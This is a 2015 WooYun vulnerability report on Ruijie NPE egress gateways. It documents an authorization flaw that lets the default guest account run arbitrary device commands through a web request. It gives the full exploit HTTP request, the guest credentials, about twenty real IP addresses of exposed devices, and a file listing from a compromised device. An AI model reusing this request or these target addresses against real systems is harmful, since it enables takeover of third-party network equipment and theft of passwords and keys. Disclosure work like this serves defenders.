当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123851

漏洞标题:锐捷NPE出口网关任意操作的命令执行

相关厂商:ruijie.com.cn

漏洞作者: 路人甲

提交时间:2015-07-01 10:39

修复时间:2015-09-29 17:52

公开时间:2015-09-29 17:52

漏洞类型:非授权访问

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-04: 细节向第三方安全合作伙伴开放
2015-08-25: 细节向核心白帽子及相关领域专家公开
2015-09-04: 细节向普通白帽子公开
2015-09-14: 细节向实习白帽子公开
2015-09-29: 细节向公众公开

简要描述:

锐捷NPE出口网关任意操作的命令执行

详细说明:

厂商:锐捷网络
产品名称:NPE网络出口引擎
官网:http://www.ruijie.com.cn/
关键字:title:锐捷网络 --NPE网络出口引擎--登录界面

11.png


列举了部分:
http://223.220.248.3/index.htm
http://221.213.54.66/index.htm
http://219.139.148.126/index.htm
http://60.19.64.146/index.htm
http://125.67.7.2/index.htm
http://202.103.10.214/index.htm
http://58.18.131.200/index.htm
http://175.174.62.25/index.htm
http://58.254.92.130/index.htm
http://58.18.163.190/index.htm
http://117.132.9.226/index.htm
http://119.255.22.13/index.htm
http://211.154.11.246/index.htm
http://221.203.77.234/index.htm
http://120.209.15.197:8888/index.htm
http://61.131.82.228:8080/index.htm
http://221.202.167.17:8080/index.htm
http://202.115.254.26/index.htm
http://1.30.21.42/index.htm
http://218.65.220.99:9090/index.htm
系统自身存在的用户有:admin、manager、guest。guest的默认账号是guest,
一个正常的guest用户登陆后的cookie是这样的:
Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; c_name=; hardtype=NPE60E; web-coding=gb2312; currentURL=1.1
之前出现越权登陆之后,锐捷将guest的账户页面仅可查看当前状态,前台是无法进行任何操作的。但是问题是,前台的可视化显示是通过直接调用命令进行展示,调用命令的时候,是没有进行任何的权限认证的,从而导致了任意代码执行。
这里以http://221.213.54.66/index.htm为例:

11.png


前台会调用各种系统命令,如端口状态、CPU状态等等
这里以其中的一条后台请求为例:

POST /WEB_VMS/LEVEL15/ HTTP/1.1
Accept: */*
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Referer: http://221.213.54.66/cache.htm
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: 221.213.54.66
Content-Length: 73
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; c_name=; hardtype=NPE60E; web-coding=gb2312; currentURL=1.1
command=show%20clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.


其中command可控,直接执行各种敏感命令均可!
如查看版本信息:

11.png


配置信息:

11.png


控制台用户密码:

11.png


当然也可以重启、恢复出厂默认、更改各项配置等等。
不仅如此,还可以获取系统任意信息及文件。
如:获取系统文件:

Mode Link      Size               MTime Name<OPTION>
-------- ---- --------- ------------------- ------------------<OPTION>
   <DIR>    1         0 1970-01-01 08:00:00 dev/<OPTION>
   <DIR>    2         0 2011-07-20 22:53:09 mnt/<OPTION>
   <DIR>    1         0 2015-06-09 08:46:13 ram/<OPTION>
   <DIR>    2         0 2015-01-07 00:11:07 tmp/<OPTION>
   <DIR>    0         0 1970-01-01 08:00:00 proc/<OPTION>
            1    239730 1970-01-01 08:02:49 ucs_gb.db <OPTION>
            1    915556 2012-07-26 08:31:33 signature.db <OPTION>
            1        34 2015-06-12 08:34:30 update_list.txt <OPTION>
            1       410 2012-07-26 08:32:49 file_list.txt <OPTION>
            1  13652864 2014-09-02 17:47:14 rgos4b8R144358.bin <OPTION>
            1   2255101 1970-01-01 08:02:52 lb-route-choose.db <OPTION>
            1       424 2011-10-11 22:52:59 rsa_private.bin <OPTION>
   <DIR>    4         0 2012-12-11 08:17:47 pkistore/<OPTION>
            1       696 2015-01-06 22:56:47 httpd_cert.crt <OPTION>
            1     25769 1970-01-01 08:02:52 fc_template.txt <OPTION>
            1   2200856 2015-06-04 08:35:08 app_sub_1.db <OPTION>
            1    124840 2015-06-04 08:35:14 app_sub_2.db <OPTION>
            1       688 2015-06-04 08:35:14 app_sub_3.db <OPTION>
            1     30023 2014-09-02 16:46:04 config20140902.text <OPTION>
            1      8891 2015-01-08 09:15:29 signature_content.db <OPTION>
            1       887 2015-01-06 22:56:47 httpd_key.pem <OPTION>
            1  14667776 1970-01-01 08:02:24 rgos.bin <OPTION>
            1        82 2014-05-05 17:20:57 tcp_close_trace.text <OPTION>
            1    150740 1970-01-01 08:02:48 ucs_big5.db <OPTION>
            1      4936 2015-05-04 16:04:57 config.text <OPTION>
            1      5273 2015-01-08 09:15:29 feedback.txt <OPTION>
            1     56882 2015-04-18 08:34:40 route-choose.db <OPTION>
   <DIR>    5         0 2008-08-09 11:23:24 portal/<OPTION>
            1       424 2011-10-11 22:52:59 rsa1_private.bin <OPTION>
   <DIR>    2         0 2015-06-12 08:50:24 feedback/<OPTION>
   <DIR>    2         0 2015-06-04 08:35:05 app_tmp/<OPTION>
            1  14667776 1970-01-01 08:01:59 rgos.bin.bak <OPTION>
            1   8978272 2015-01-10 08:39:54 web_management_pack.upd <OPTION>
            1       390 2015-06-04 08:35:04 app_file_list.txt <OPTION>
   <DIR>    2         0 2012-12-11 11:29:56 user_auth/<OPTION>
            1     42496 1970-01-01 08:00:32 portal_pack.upd <OPTION>
            1      3275 2011-10-01 23:47:17 config.text.ord <OPTION>
   <DIR>    2         0 2015-06-10 08:34:23 http_update/<OPTION>
--------------------------------------------------------------<OPTION>
27 Files (Total size 58035091 Bytes), 11 Directories.<OPTION>
Total 535822336 bytes (511MB) in this device, 448499712 bytes (427MB) available.<OPTION>

漏洞证明:

如上!

修复方案:

如上!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-07-01 17:50

厂商回复:

修复方案:
设备软件版本升级到最新版即可

最新状态:

2015-07-02:已经在官网,提供解决漏洞的新版本供下载。并且每次发布新版本后,设备上的web都会有一次提示更新,请根据提示升级。